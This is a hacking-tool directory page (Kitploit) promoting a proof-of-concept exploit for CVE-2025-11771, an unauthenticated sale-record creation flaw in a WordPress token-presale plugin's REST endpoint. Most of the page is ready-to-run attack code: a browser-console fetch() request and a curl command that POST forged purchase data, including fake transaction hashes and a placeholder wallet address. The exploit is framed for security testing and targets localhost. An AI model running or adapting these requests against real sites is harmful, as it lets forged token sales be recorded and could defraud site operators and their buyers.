Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-11771 — Proof-of-concept exploit for CVE-2025-11771 demonstrating unauthenticated sale record creation via a WordPress REST API endpoint, with browser console and curl examples for security testing. | Kitploit
Tools/GitHubGitHub/jfriedli/cve-2025-11771
Vulnerability AnalysisExploitationWeb Application ExploitationAPI Security TestingPenetration Testing
GitHubjfriedli/cve-2025-11771

CVE-2025-11771

Proof-of-concept exploit for CVE-2025-11771 demonstrating unauthenticated sale record creation via a WordPress REST API endpoint, with browser console and curl examples for security testing.

View Repository
35 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Exploit: Unauthenticated Sale Record Creation

Browser console

root@kitploit:~
fetch('http://localhost/wordpress/wp-json/tokenico/create-sale-record', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: new URLSearchParams({
    networkId: "137",
    presaleKey: "TESTKEY1234",
    createdAt: String(Date.now()),
    tokenAmount: "1000",
    nativeCurrency: "MATIC",
    purchaseAmount: "777",
    transactionHash: "evil-" + Date.now(),
    transactionUrl: "https://example.org/tx/" + Date.now(),
    receiverAddress: "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef",
    receiverAddressUrl: "https://example.org/address/0xdead"
  })
}).then(r => r.text()).then(console.log);

curl

root@kitploit:~
curl -s -X POST 'http://localhost/wordpress/wp-json/tokenico/create-sale-record' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'networkId=137&presaleKey=TESTKEY1234&createdAt=1724246400000&tokenAmount=1000&nativeCurrency=MATIC&purchaseAmount=777&transactionHash=evil-1724246400000&transactionUrl=https://example.org/tx/evil-1724246400000&receiverAddress=0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef&receiverAddressUrl=https://example.org/address/0xdead'
Download Tool